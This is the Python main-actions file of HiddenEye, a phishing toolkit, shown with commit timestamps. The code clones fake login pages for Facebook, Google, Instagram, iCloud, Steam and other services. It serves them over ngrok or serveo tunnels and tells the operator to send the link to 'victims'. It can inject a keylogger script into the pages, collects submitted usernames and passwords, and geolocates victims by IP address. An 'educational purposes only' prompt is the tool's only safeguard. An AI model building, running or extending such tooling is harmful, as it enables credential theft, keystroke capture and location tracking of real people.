2018-10-29 03:49:19 +08:00
#Any actions must be here
from os import system , path
from distutils . dir_util import copy_tree
from time import sleep
import re
import json
from urllib . request import urlopen
2018-12-07 11:59:05 +08:00
from subprocess import check_output , CalledProcessError
2018-12-23 11:50:28 +08:00
from sys import stdout , argv , exit
2018-10-31 00:44:11 +08:00
from Defs . Configurations import readConfig , ifSettingsNotExists
2018-11-20 01:49:09 +08:00
from Defs . Languages import *
2019-01-28 06:45:33 +08:00
RED , WHITE , CYAN , GREEN , DEFAULT = ' \033 [91m ' , ' \033 [46m ' , ' \033 [36m ' , ' \033 [1;32m ' , ' \033 [0m '
2018-10-29 03:49:19 +08:00
2018-11-30 07:20:52 +08:00
installGetText ( )
2018-11-29 04:56:33 +08:00
languageSelector ( )
2018-10-29 04:30:33 +08:00
ifSettingsNotExists ( )
2018-10-29 03:49:19 +08:00
config = readConfig ( )
2018-11-20 01:49:09 +08:00
2018-10-29 03:49:19 +08:00
logFile = None
didBackground = config . get ( " Settings " , " DidBackground " )
for arg in argv :
if arg == " --nolog " : #If true - don't log
didBackground = False
if config . get ( " Settings " , " DidBackground " ) == " True " :
logFile = open ( " log.txt " , " w " )
def runPhishing ( page , customOption ) : #Phishing pages selection menu
system ( ' rm -Rf Server/www/*.* && touch Server/www/usernames.txt && touch Server/www/ip.txt && cp WebPages/ip.php Server/www/ && cp WebPages/KeyloggerData.txt Server/www/ && cp WebPages/keylogger.js Server/www/ && cp WebPages/keylogger.php Server/www/ ' )
if customOption == ' 1 ' and page == ' Facebook ' :
copy_tree ( " WebPages/fb_standard/ " , " Server/www/ " )
if customOption == ' 2 ' and page == ' Facebook ' :
copy_tree ( " WebPages/fb_advanced_poll/ " , " Server/www/ " )
if customOption == ' 3 ' and page == ' Facebook ' :
copy_tree ( " WebPages/fb_security_fake/ " , " Server/www/ " )
if customOption == ' 4 ' and page == ' Facebook ' :
copy_tree ( " WebPages/fb_messenger/ " , " Server/www/ " )
elif customOption == ' 1 ' and page == ' Google ' :
copy_tree ( " WebPages/google_standard/ " , " Server/www/ " )
elif customOption == ' 2 ' and page == ' Google ' :
copy_tree ( " WebPages/google_advanced_poll/ " , " Server/www/ " )
elif customOption == ' 3 ' and page == ' Google ' :
copy_tree ( " WebPages/google_advanced_web/ " , " Server/www/ " )
elif page == ' LinkedIn ' :
copy_tree ( " WebPages/linkedin/ " , " Server/www/ " )
elif page == ' GitHub ' :
copy_tree ( " WebPages/GitHub/ " , " Server/www/ " )
elif page == ' StackOverflow ' :
copy_tree ( " WebPages/stackoverflow/ " , " Server/www/ " )
elif page == ' WordPress ' :
copy_tree ( " WebPages/wordpress/ " , " Server/www/ " )
elif page == ' Twitter ' :
copy_tree ( " WebPages/twitter/ " , " Server/www/ " )
elif page == ' Snapchat ' :
copy_tree ( " WebPages/Snapchat_web/ " , " Server/www/ " )
elif page == ' Yahoo ' :
copy_tree ( " WebPages/yahoo_web/ " , " Server/www/ " )
elif page == ' Twitch ' :
copy_tree ( " WebPages/twitch/ " , " Server/www/ " )
elif page == ' Microsoft ' :
copy_tree ( " WebPages/live_web/ " , " Server/www/ " )
elif page == ' Steam ' :
copy_tree ( " WebPages/steam/ " , " Server/www/ " )
elif page == ' iCloud ' :
copy_tree ( " WebPages/iCloud/ " , " Server/www/ " )
elif customOption == ' 1 ' and page == ' Instagram ' :
copy_tree ( " WebPages/Instagram_web/ " , " Server/www/ " )
elif customOption == ' 2 ' and page == ' Instagram ' :
copy_tree ( " WebPages/Instagram_autoliker/ " , " Server/www/ " )
2018-12-12 18:59:32 +08:00
elif customOption == ' 3 ' and page == ' Instagram ' :
2019-03-02 16:05:38 +08:00
copy_tree ( " WebPages/Instagram_advanced_attack/ " , " Server/www/ " )
elif customOption == ' 4 ' and page == ' Instagram ' :
copy_tree ( " WebPages/Instagram_VerifiedBadge/ " , " Server/www/ " )
2018-10-29 03:49:19 +08:00
elif customOption == ' 1 ' and page == ' VK ' :
copy_tree ( " WebPages/VK/ " , " Server/www/ " )
elif customOption == ' 2 ' and page == ' VK ' :
copy_tree ( " WebPages/VK_poll_method/ " , " Server/www/ " )
def selectServer ( ) : #Question where user must select server
2019-01-28 06:45:33 +08:00
system ( ' clear ' )
print ( _ ( '''
{ 1 } _ _ . ___ ___ ___ _ _ { 0 } ___ _ _ ___ { 1 }
| __ | | ] | ] | | __ | \ | { 0 } | __ \__ / | __ { 1 }
| | | ] __ | ] __ | | __ | \| { 0 } | __ | | | __ { 1 }
{ 0 } http : / / github . com / darksecdevelopers
{ 0 } * * BY : DARKSEC * * \n \n - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \n { 0 } [ HOST SERVER SELECTION ] { 1 } ! ! { 0 } \n - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ''' ).format(RED, DEFAULT))
print ( _ ( " \n {0} [ {1} ! {0} ] {0} SERVEO IS MORE ADVANCED THAN NGROK. \n {0} [ {1} ! {0} ] {0} STILL ITS YOUR CHOICE {1} " ) . format ( RED , DEFAULT ) )
print ( _ ( " \n {0} [ {1} * {0} ] {0} Select Any Available Server: {1} " ) . format ( RED , DEFAULT ) )
print ( _ ( " \n {0} [ {1} 1 {0} ] {1} Ngrok \n {0} [ {1} 2 {0} ] {1} Serveo " ) . format ( RED , DEFAULT ) )
2018-10-30 22:05:25 +08:00
2019-01-28 06:45:33 +08:00
choice = input ( " \n {0} HiddenEye >>> {1} " . format ( RED , DEFAULT ) )
system ( ' clear ' )
2018-10-29 03:49:19 +08:00
if choice == ' 1 ' :
2019-01-28 06:45:33 +08:00
2018-10-29 03:49:19 +08:00
runNgrok ( )
elif choice == ' 2 ' :
runServeo ( )
else :
system ( ' clear ' )
return selectServer ( )
def runNgrok ( ) :
system ( ' ./Server/ngrok http 1111 > /dev/null & ' )
while True :
sleep ( 2 )
system ( ' curl -s -N http://127.0.0.1:4040/status | grep " https://[0-9a-z]* \ .ngrok.io " -oh > ngrok.url ' )
urlFile = open ( ' ngrok.url ' , ' r ' )
url = urlFile . read ( )
urlFile . close ( )
if re . match ( " https://[0-9a-z]* \ .ngrok.io " , url ) != None :
2019-01-28 06:45:33 +08:00
print ( '''
{ 1 } _ _ . ___ ___ ___ _ _ { 0 } ___ _ _ ___ { 1 }
| __ | | ] | ] | | __ | \ | { 0 } | __ \__ / | __ { 1 }
| | | ] __ | ] __ | | __ | \| { 0 } | __ | | | __ { 1 }
{ 0 } http : / / github . com / darksecdevelopers
2019-03-07 10:41:28 +08:00
{ 0 } * * BY : DARKSEC * * \n \n - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \n { 0 } [ ATTACK IS IN PROGRESS ] { 1 } ! ! { 0 } \n - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \n \n \n { 0 } [ { 1 } * { 0 } ] { 1 } Localhost URL : { 2 } http : / / 127.0 .0 .1 : 1111 \n { 0 } [ { 1 } * { 0 } ] { 1 } Ngrok URL : { 2 } ''' .format(RED, DEFAULT, GREEN) + url + ''' { 1 } ''' .format(RED, DEFAULT, GREEN))
2019-02-27 22:44:19 +08:00
2018-10-29 03:49:19 +08:00
break
2019-03-07 10:41:28 +08:00
2018-10-29 03:49:19 +08:00
def runServeo ( ) :
2019-03-07 10:41:28 +08:00
print ( _ ( '''
{ 1 } _ _ . ___ ___ ___ _ _ { 0 } ___ _ _ ___ { 1 }
| __ | | ] | ] | | __ | \ | { 0 } | __ \__ / | __ { 1 }
| | | ] __ | ] __ | | __ | \| { 0 } | __ | | | __ { 1 }
{ 0 } http : / / github . com / darksecdevelopers
{ 0 } * * BY : DARKSEC * * \n \n - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \n { 0 } [ SERVEO URL TYPE SELECTION ] { 1 } ! ! { 0 } \n - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \n { 0 } [ { 1 } ! { 0 } ] { 1 } REMEMBER ? Custom Url ' s generating Can irritate you. \n {0} [ {1} ! {0} ] {1} As the Serveo becomes popular, Getting a desired domain may be tough. ' ' ' ) . format ( RED , DEFAULT ) )
print ( _ ( " \n {0} [ {1} * {0} ] {0} CHOOSE ANY SERVEO URL TYPE TO GENERATE PHISHING LINK: {1} " ) . format ( RED , DEFAULT ) )
print ( _ ( " \n {0} [ {1} 1 {0} ] {1} Custom URL {0} (Generates desired url) \n {0} [ {1} 2 {0} ] {1} Random URL {0} (Generates Random url) " ) . format ( RED , DEFAULT ) )
choice = input ( " \n \n {1} {0} YOUR CHOICE >>> {1} " . format ( RED , DEFAULT ) )
system ( ' clear ' )
if choice == ' 1 ' :
customServeo ( )
elif choice == ' 2 ' :
randomServeo ( )
else :
system ( ' clear ' )
return runServeo ( )
def customServeo ( ) :
2019-01-28 06:45:33 +08:00
print ( _ ( '''
{ 1 } _ _ . ___ ___ ___ _ _ { 0 } ___ _ _ ___ { 1 }
| __ | | ] | ] | | __ | \ | { 0 } | __ \__ / | __ { 1 }
| | | ] __ | ] __ | | __ | \| { 0 } | __ | | | __ { 1 }
{ 0 } http : / / github . com / darksecdevelopers
2019-03-07 10:41:28 +08:00
{ 0 } * * BY : DARKSEC * * \n \n - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \n { 0 } [ CREATE A CUSTOM URL HERE ] { 1 } ! ! { 0 } \n - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \n \n { 0 } [ { 1 } ! { 0 } ] { 1 } [ YOU CAN MAKE YOUR URL SIMILAR TO AUTHENTIC URL ' s ] \n {0} [ {1} ! {0} ] {1} Again ? Use Your Social-engineering Skills Here. \n \n \n {0} Insert a custom subdomain for serveo ' ' ' ) . format ( RED , DEFAULT ) )
2019-01-28 06:45:33 +08:00
lnk = input ( _ ( " \n {0} CUSTOM Subdomain>>> {1} " ) . format ( RED , DEFAULT ) )
2018-12-07 11:59:05 +08:00
if not " .serveo.net " in lnk :
lnk + = " .serveo.net "
else :
pass
2018-12-06 21:53:15 +08:00
system ( ' ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -R %s :80:localhost:1111 serveo.net > link.url 2> /dev/null & ' % ( lnk ) )
2018-10-29 03:49:19 +08:00
sleep ( 7 )
2018-11-01 13:27:14 +08:00
try :
2018-12-09 14:14:19 +08:00
output = check_output ( " grep -o ' . \ { 0,0 \ }http. \ { 0,100 \ } ' link.url " , shell = True )
2018-12-07 11:59:05 +08:00
url = str ( output ) . strip ( " b ' \ n r " )
2019-03-07 10:41:28 +08:00
print ( " \n {0} [ {1} ! {0} ] {1} SEND THIS SERVEO URL TO VICTIMS- \n {0} [ {1} * {0} ] {1} Localhost URL: {2} http://127.0.0.1:1111 \n {0} [ {1} * {0} ] {1} SERVEO URL: {2} " . format ( RED , DEFAULT , GREEN ) + url + " {1} " . format ( RED , DEFAULT , GREEN ) )
2018-11-29 04:56:33 +08:00
print ( " \n " )
2019-02-27 22:44:19 +08:00
2018-12-07 11:59:05 +08:00
except CalledProcessError :
2019-02-24 23:18:02 +08:00
print ( _ ( ''' \n \n {0} FAILED TO GET THIS DOMAIN. !!! \n \n {0} LOOKS LIKE CUSTOM URL IS NOT VALID or ALREADY OCCUPIED BY SOMEONE ELSE. !!! \n \n {0} [ {1} ! {0} ]TRY TO SELECT ANOTHER CUSTOM DOMAIN {1} (GOING BACK).. !! \n
2018-12-23 11:49:28 +08:00
''' ).format(RED, DEFAULT))
2019-02-24 23:18:02 +08:00
sleep ( 4 )
system ( ' clear ' )
2019-03-07 10:41:28 +08:00
return customServeo ( )
def randomServeo ( ) :
system ( ' clear ' )
print ( _ ( '''
{ 1 } _ _ . ___ ___ ___ _ _ { 0 } ___ _ _ ___ { 1 }
| __ | | ] | ] | | __ | \ | { 0 } | __ \__ / | __ { 1 }
| | | ] __ | ] __ | | __ | \| { 0 } | __ | | | __ { 1 }
{ 0 } http : / / github . com / darksecdevelopers
{ 0 } * * BY : DARKSEC * * \n \n - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \n { 0 } [ RANDOM SERVEO URL ] { 1 } ! ! { 0 } \n - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ''' ).format(RED, DEFAULT))
system ( ' ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -R 80:localhost:1111 serveo.net > link.url 2> /dev/null & ' )
sleep ( 8 )
try :
output = check_output ( " grep -o ' . \ { 0,0 \ }http. \ { 0,100 \ } ' link.url " , shell = True )
url = str ( output ) . strip ( " b ' \ n r " )
print ( " \n {0} [ {1} ! {0} ] {1} SEND THIS SERVEO URL TO VICTIMS- \n \n {0} [ {1} * {0} ] {1} Localhost URL: {2} http://127.0.0.1:1111 \n {0} [ {1} * {0} ] {1} SERVEO URL: {2} " . format ( RED , DEFAULT , GREEN ) + url + " {1} " . format ( RED , DEFAULT , GREEN ) )
print ( " \n " )
except CalledProcessError :
sleep ( 4 )
system ( ' clear ' )
return randomServeo ( )
2019-02-27 22:44:19 +08:00
2018-10-29 03:49:19 +08:00
def runMainMenu ( ) : #menu where user select what they wanna use
2019-01-28 06:45:33 +08:00
if 256 != system ( ' which php ' ) : #Checking if user have PHP
print ( " ----------------------- " . format ( CYAN , DEFAULT ) )
print ( _ ( " [PHP INSTALLATION FOUND] " ) . format ( CYAN , DEFAULT ) )
print ( " ----------------------- " . format ( CYAN , DEFAULT ) )
else :
print ( _ ( " -- {0} > {1} PHP NOT FOUND: \n {0} * {1} Please install PHP and run me again.http://www.php.net/ " ) . format ( CYAN , DEFAULT ) )
exit ( 0 )
for i in range ( 101 ) :
sleep ( 0.05 )
stdout . write ( " \r " )
stdout . write ( _ ( " {0} [ {1} * {0} ] {1} HiddenEye is Opening. Please Wait... {2} % " ) . format ( RED , DEFAULT , i ) )
stdout . flush ( )
if input ( _ ( " \n {2} [ {1} ! {2} ] {1} Do you agree to use this tool for educational purposes only? ( {2} y {1} / {0} n {1} ) \n {2} HiddenEye >>> {1} " ) . format ( CYAN , DEFAULT , RED ) ) . upper ( ) != ' Y ' : #Question where user must accept education purposes
system ( ' clear ' )
print ( _ ( ' \n \n [ {0} YOU ARE NOT AUTHORIZED TO USE THIS TOOL.YOU CAN ONLY USE IT FOR EDUCATIONAL PURPOSE. GOOD BYE! {1} ] \n \n ' ) . format ( RED , DEFAULT ) )
exit ( 0 )
2018-10-29 03:49:19 +08:00
system ( ' clear ' )
2018-10-31 10:28:03 +08:00
print ( _ ( '''
2018-10-29 03:49:19 +08:00
{ 1 } < == == == == == == == == == == == == == == == == == == == == == == == == == == == == == == == == == == == == == == = >
| | | |
{ 1 } | | █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ { 3 } █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ { 1 } | |
{ 1 } | | █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ { 3 } █ █ █ █ █ █ █ █ { 1 } | |
{ 1 } | | █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ { 3 } █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ { 1 } | |
{ 1 } | | █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ { 3 } █ █ █ █ █ █ { 1 } | |
{ 1 } | | █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ { 3 } █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ { 1 } | |
| | | |
2018-10-30 14:18:21 +08:00
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
2019-03-07 11:11:27 +08:00
v { 3 } 0 { 1 } . { 3 } 2 { 1 } . { 3 } 5 { 1 } BY : DARKSEC { 2 }
2018-10-30 14:18:21 +08:00
{ 0 } [ NOW WITH LIVE VICTIM ATTACK INFORMATION ]
{ 0 } A KEYLOGGER WILL BE DEPLOYED FOR YOU , TO CAPTURE EVERY KEYSTROKE ]
2018-10-29 03:49:19 +08:00
< == == == == == == == == == == == == == == == == == == == == == == == == == == == == == == == == == == == == == == = >
2018-10-31 10:28:03 +08:00
''' ).format(GREEN, DEFAULT, CYAN, RED))
2018-10-29 03:49:19 +08:00
2019-01-28 06:45:33 +08:00
option = input ( _ ( " ************************* \n SELECT ANY ATTACK VECTOR FOR YOUR VICTIM: \n ************************* \n {0} [ {1} 1 {0} ] {1} Facebook \n {0} [ {1} 2 {0} ] {1} Google \n {0} [ {1} 3 {0} ] {1} LinkedIn \n {0} [ {1} 4 {0} ] {1} GitHub \n {0} [ {1} 5 {0} ] {1} StackOverflow \n {0} [ {1} 6 {0} ] {1} WordPress \n {0} [ {1} 7 {0} ] {1} Twitter \n {0} [ {1} 8 {0} ] {1} Instagram \n {0} [ {1} 9 {0} ] {1} Snapchat \n {0} [ {1} 10 {0} ] {1} Yahoo \n {0} [ {1} 11 {0} ] {1} Twitch \n {0} [ {1} 12 {0} ] {1} Microsoft \n {0} [ {1} 13 {0} ] {1} Steam \n {0} [ {1} 14 {0} ] {1} VK \n {0} [ {1} 15 {0} ] {1} iCloud \n {0} HiddenEye >>> {1} " ) . format ( RED , DEFAULT ) )
if option == ' 1 ' :
2018-10-29 03:49:19 +08:00
loadModule ( ' Facebook ' )
2019-01-28 06:45:33 +08:00
customOption = input ( _ ( " \n Operation mode: \n \n {0} [ {1} 1 {0} ] {1} Standard Page Phishing \n \n {0} [ {1} 2 {0} ] {1} Advanced Phishing-Poll Ranking Method(Poll_mode/login_with) \n \n {0} [ {1} 3 {0} ] {1} Facebook Phishing- Fake Security issue(security_mode) \n \n {0} [ {1} 4 {0} ] {1} Facebook Phising-Messenger Credentials(messenger_mode) \n \n {0} HiddenEye >>> {1} " ) . format ( RED , DEFAULT ) )
2018-10-29 03:49:19 +08:00
runPhishing ( ' Facebook ' , customOption )
2019-01-28 06:45:33 +08:00
elif option == ' 2 ' :
2018-10-29 03:49:19 +08:00
loadModule ( ' Google ' )
2019-01-28 06:45:33 +08:00
customOption = input ( _ ( " \n Operation mode: \n \n {0} [ {1} 1 {0} ] {1} Standard Page Phishing \n \n {0} [ {1} 2 {0} ] {1} Advanced Phishing(poll_mode/login_with) \n \n {0} [ {1} 3 {0} ] {1} New Google Web \n \n {0} HiddenEye >>> {1} " ) . format ( RED , DEFAULT ) )
2018-10-29 03:49:19 +08:00
runPhishing ( ' Google ' , customOption )
2019-01-28 06:45:33 +08:00
elif option == ' 3 ' :
2018-10-29 03:49:19 +08:00
loadModule ( ' LinkedIn ' )
customOption = ' '
runPhishing ( ' LinkedIn ' , customOption )
2019-01-28 06:45:33 +08:00
elif option == ' 4 ' :
2018-10-29 03:49:19 +08:00
loadModule ( ' GitHub ' )
customOption = ' '
runPhishing ( ' GitHub ' , customOption )
2019-01-28 06:45:33 +08:00
elif option == ' 5 ' :
2018-10-29 03:49:19 +08:00
loadModule ( ' StackOverflow ' )
customOption = ' '
runPhishing ( ' StackOverflow ' , customOption )
2019-01-28 06:45:33 +08:00
elif option == ' 6 ' :
2018-10-29 03:49:19 +08:00
loadModule ( ' WordPress ' )
customOption = ' '
runPhishing ( ' WordPress ' , customOption )
2019-01-28 06:45:33 +08:00
elif option == ' 7 ' :
2018-10-29 03:49:19 +08:00
loadModule ( ' Twitter ' )
customOption = ' '
runPhishing ( ' Twitter ' , customOption )
2019-01-28 06:45:33 +08:00
elif option == ' 8 ' :
2018-10-29 03:49:19 +08:00
loadModule ( ' Instagram ' )
2019-03-02 16:05:38 +08:00
customOption = input ( _ ( " \n Operation mode: \n \n {0} [ {1} 1 {0} ] {1} Standard Instagram Web Page Phishing \n \n {0} [ {1} 2 {0} ] {1} Instagram Autoliker Phising (To Lure The Users) \n \n {0} [ {1} 3 {0} ] {1} Instagram Advanced Scenario (Appears as Instagram Profile) \n \n {0} [ {1} 4 {0} ] {1} Instagram Verified Badge Attack (Lure To Get Blue Badge) {1} *[NEW]* \n \n {0} HiddenEye >>> {1} " ) . format ( RED , DEFAULT ) )
2018-10-29 03:49:19 +08:00
runPhishing ( ' Instagram ' , customOption )
2019-01-28 06:45:33 +08:00
elif option == ' 9 ' :
2018-10-29 03:49:19 +08:00
loadModule ( ' Snapchat ' )
customOption = ' '
runPhishing ( ' Snapchat ' , customOption )
elif option == ' 10 ' :
loadModule ( ' Yahoo ' )
customOption = ' '
runPhishing ( ' Yahoo ' , customOption )
elif option == ' 11 ' :
loadModule ( ' Twitch ' )
customOption = ' '
runPhishing ( ' Twitch ' , customOption )
elif option == ' 12 ' :
loadModule ( ' Microsoft ' )
customOption = ' '
runPhishing ( ' Microsoft ' , customOption )
elif option == ' 13 ' :
loadModule ( ' Steam ' )
customOption = ' '
runPhishing ( ' Steam ' , customOption )
elif option == ' 14 ' :
loadModule ( ' VK ' )
2019-01-28 06:45:33 +08:00
customOption = input ( _ ( " \n Operation mode: \n \n {0} [ {1} 1 {0} ] {1} Standard VK Web Page Phishing \n \n {0} [ {1} 2 {0} ] {1} Advanced Phishing(poll_mode/login_with) \n \n {0} HiddenEye >>> {1} " ) . format ( RED , DEFAULT ) )
2018-10-29 03:49:19 +08:00
runPhishing ( ' VK ' , customOption )
elif option == ' 15 ' :
loadModule ( ' iCloud ' )
customOption = ' '
runPhishing ( ' iCloud ' , customOption )
else :
exit ( 0 )
def loadModule ( module ) : #This one just show text..
2018-10-31 10:28:03 +08:00
print ( _ ( ''' {0}
2019-01-28 06:45:33 +08:00
[ { 1 } * { 0 } ] module loaded . Building site . . . { 0 } \n - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ''' ).format(RED, DEFAULT))
2018-10-29 03:49:19 +08:00
def inputCustom ( ) : #Question where user can input custom web-link
2019-01-28 06:45:33 +08:00
system ( ' clear ' )
print ( _ ( '''
{ 1 } _ _ . ___ ___ ___ _ _ { 0 } ___ _ _ ___ { 1 }
| __ | | ] | ] | | __ | \ | { 0 } | __ \__ / | __ { 1 }
| | | ] __ | ] __ | | __ | \| { 0 } | __ | | | __ { 1 }
{ 0 } http : / / github . com / darksecdevelopers
{ 0 } * * BY : DARKSEC * * \n \n - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \n { 0 } [ PUT YOUR REDIRECTING URL HERE ] { 1 } ! ! { 0 } \n - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ''' ).format(RED, DEFAULT))
print ( _ ( ''' \n {1} ** {0} (Choose Wisely As Your Victim Will Redirect to This Link) ''' ) . format ( RED , DEFAULT ) )
print ( _ ( ''' \n {1} ** {0} (Leave Blank To Loop The Phishing Page) ''' ) . format ( RED , DEFAULT ) )
2019-02-03 23:06:14 +08:00
print ( _ ( ''' \n {0} [ {1} /! \ {0} ] {0} Insert a custom redirect url: ''' ) . format ( RED , DEFAULT ) )
2019-01-28 06:45:33 +08:00
custom = input ( _ ( ''' \n {0} REDIRECT HERE>>> {1} ''' ) . format ( RED , DEFAULT ) )
2018-10-30 19:59:46 +08:00
if ' http:// ' in custom or ' https:// ' in custom :
2018-10-29 03:49:19 +08:00
pass
else :
custom = ' http:// ' + custom
if path . exists ( ' Server/www/post.php ' ) and path . exists ( ' Server/www/login.php ' ) :
with open ( ' Server/www/login.php ' ) as f :
read_data = f . read ( )
c = read_data . replace ( ' <CUSTOM> ' , custom )
f = open ( ' Server/www/login.php ' , ' w ' )
f . write ( c )
f . close ( )
with open ( ' Server/www/post.php ' ) as f :
read_data = f . read ( )
c = read_data . replace ( ' <CUSTOM> ' , custom )
f = open ( ' Server/www/post.php ' , ' w ' )
f . write ( c )
f . close ( )
else :
with open ( ' Server/www/login.php ' ) as f :
read_data = f . read ( )
c = read_data . replace ( ' <CUSTOM> ' , custom )
f = open ( ' Server/www/login.php ' , ' w ' )
f . write ( c )
f . close ( )
2019-01-28 06:45:33 +08:00
def keyloggerprompt ( ) :
system ( ' clear ' )
print ( _ ( ''' {1}
_ _ . ___ ___ ___ _ _ { 0 } ___ _ _ ___ { 1 }
| __ | | ] | ] | | __ | \ | { 0 } | __ \__ / | __ { 1 }
| | | ] __ | ] __ | | __ | \| { 0 } | __ | | | __ { 1 }
{ 0 } http : / / github . com / darksecdevelopers
{ 0 } * * BY : DARKSEC * *
''' ).format(RED, DEFAULT))
print ( _ ( " ------------------------------- \n {0} [ KEYLOGGER PROMPT ] {1} !! {0} \n ------------------------------- " ) . format ( RED , DEFAULT ) )
2018-10-29 03:49:19 +08:00
2019-01-28 06:45:33 +08:00
def addingkeylogger ( ) :
2019-03-07 10:41:28 +08:00
print ( _ ( " \n {0} [ {1} * {0} ] {0} DO YOU WANT TO ADD A KEYLOGGER IN PHISHING PAGE- {1} (Y/N) " ) . format ( RED , DEFAULT ) )
choice = input ( " \n \n {1} {0} YOUR CHOICE >>> {1} " . format ( RED , DEFAULT ) )
if choice == ' y ' or choice == ' Y ' :
addkeylogger ( )
else :
system ( ' clear ' )
pass
def addkeylogger ( ) :
print ( _ ( " \n {0} [ {1} # {0} ]Keylgger {0} ADDED !!! " ) . format ( RED , DEFAULT ) )
if path . exists ( ' Server/www/index.html ' ) and path . exists ( ' Server/www/index.php ' ) :
with open ( ' Server/www/index.php ' ) as f :
read_data = f . read ( )
c = read_data . replace ( ' </title> ' , ' </title><script src= " keylogger.js " ></script> ' )
f = open ( ' Server/www/index.php ' , ' w ' )
f . write ( c )
2019-01-28 06:45:33 +08:00
with open ( ' Server/www/index.html ' ) as f :
read_data = f . read ( )
2019-01-30 02:40:25 +08:00
c = read_data . replace ( ' </title> ' , ' </title><script src= " keylogger.js " ></script> ' )
2019-01-28 06:45:33 +08:00
f = open ( ' Server/www/index.html ' , ' w ' )
2019-03-07 10:41:28 +08:00
f . write ( c )
sleep ( 4 )
2018-10-29 03:49:19 +08:00
def runServer ( ) :
system ( " cd Server/www/ && php -S 127.0.0.1:1111 > /dev/null 2>&1 & " )
2018-10-30 05:23:45 +08:00
def endMessage ( ) : #Message when HiddenEye exit
2018-10-29 03:49:19 +08:00
system ( ' clear ' )
2018-10-31 10:28:03 +08:00
print ( _ ( '''
2019-01-28 06:45:33 +08:00
{ 1 } _ . . . . ~ ~ ~ ~ == == = ~ ~ ~ ~ . . . . _
. ' ========= {3} /----= \ {1} =========>
/ := == == == == { 3 } / - - - - - == == \{ 1 }
| == == == == == { 3 } | - - - - - == == == | { 1 } == == == == == >
\:= == == == == { 3 } \- - - == == == / { 1 }
2018-10-29 03:49:19 +08:00
\== == == == == { 3 } \== == = / { 1 } == == == == == >
` ` ` ` ~ ~ ~ ~ == == == = ~ ~ ~ ~ ` ` ` `
2019-01-28 06:45:33 +08:00
2018-10-30 14:18:21 +08:00
{ 3 } HIDDEN EYE { 3 } BY : DARKSEC TEAM
2019-01-28 06:45:33 +08:00
{ 0 } THANKS FOR USING IT . IF YOU LIKE IT THEN , HELP US WE NEED MORE SUPPORT .
{ 3 } https : / / github . com / DarkSecDevelopers / HiddenEye ''' ).format(GREEN, DEFAULT, CYAN, RED))
2018-10-29 03:49:19 +08:00
def getCredentials ( ) :
2018-10-30 22:22:44 +08:00
2018-10-31 10:28:03 +08:00
print ( _ ( " {0} [ {1} * {0} ] {1} Waiting for credentials//Keystrokes//Victim ' s device info. \n " ) . format ( CYAN , DEFAULT ) )
2018-10-29 03:49:19 +08:00
while True :
with open ( ' Server/www/usernames.txt ' ) as creds :
lines = creds . read ( ) . rstrip ( )
if len ( lines ) != 0 :
writeLog ( ' ====================================================================== ' . format ( RED , DEFAULT ) )
2018-11-20 01:49:09 +08:00
writeLog ( _ ( ' {0} [ CREDENTIALS FOUND ] {1} : \n {0} {2} {1} ' ) . format ( GREEN , DEFAULT , lines ) )
2018-10-29 03:49:19 +08:00
system ( ' rm -rf Server/www/usernames.txt && touch Server/www/usernames.txt ' )
writeLog ( ' ====================================================================== ' . format ( RED , DEFAULT ) )
creds . close ( )
with open ( ' Server/www/ip.txt ' ) as creds :
lines = creds . read ( ) . rstrip ( )
if len ( lines ) != 0 :
2018-12-05 10:17:02 +08:00
ip = re . match ( ' Victim Public IP: (.*?) \n ' , lines ) . group ( 1 )
2018-12-08 13:29:48 +08:00
user = re . match ( ' Current logged in user: (a-z0-9) \n ' , lines )
2018-11-20 01:49:09 +08:00
resp = urlopen ( ' https://ipinfo.io/ {0} /json ' . format ( ip ) )
2018-10-29 03:49:19 +08:00
ipinfo = json . loads ( resp . read ( ) . decode ( resp . info ( ) . get_param ( ' charset ' ) or ' utf-8 ' ) )
if ' bogon ' in ipinfo :
log ( ' ====================================================================== ' . format ( RED , DEFAULT ) )
2018-11-20 01:49:09 +08:00
log ( _ ( ' \n {0} [ VICTIM IP BONUS ] {1} : \n {0} {2} {1} ' ) . format ( GREEN , DEFAULT , lines ) )
2018-10-29 03:49:19 +08:00
else :
matchObj = re . match ( ' ^(.*?),(.*)$ ' , ipinfo [ ' loc ' ] )
latitude = matchObj . group ( 1 )
longitude = matchObj . group ( 2 )
writeLog ( ' ====================================================================== ' . format ( RED , DEFAULT ) )
2018-11-20 01:49:09 +08:00
writeLog ( _ ( ' \n {0} [ VICTIM INFO FOUND ] {1} : \n {0} {2} {1} ' ) . format ( GREEN , DEFAULT , lines ) )
2018-10-31 10:28:03 +08:00
writeLog ( _ ( ' \n {0} Longitude: {2} \n Latitude: {3} {1} ' ) . format ( GREEN , DEFAULT , longitude , latitude ) )
writeLog ( _ ( ' \n {0} ISP: {2} \n Country: {3} {1} ' ) . format ( GREEN , DEFAULT , ipinfo [ ' org ' ] , ipinfo [ ' country ' ] ) )
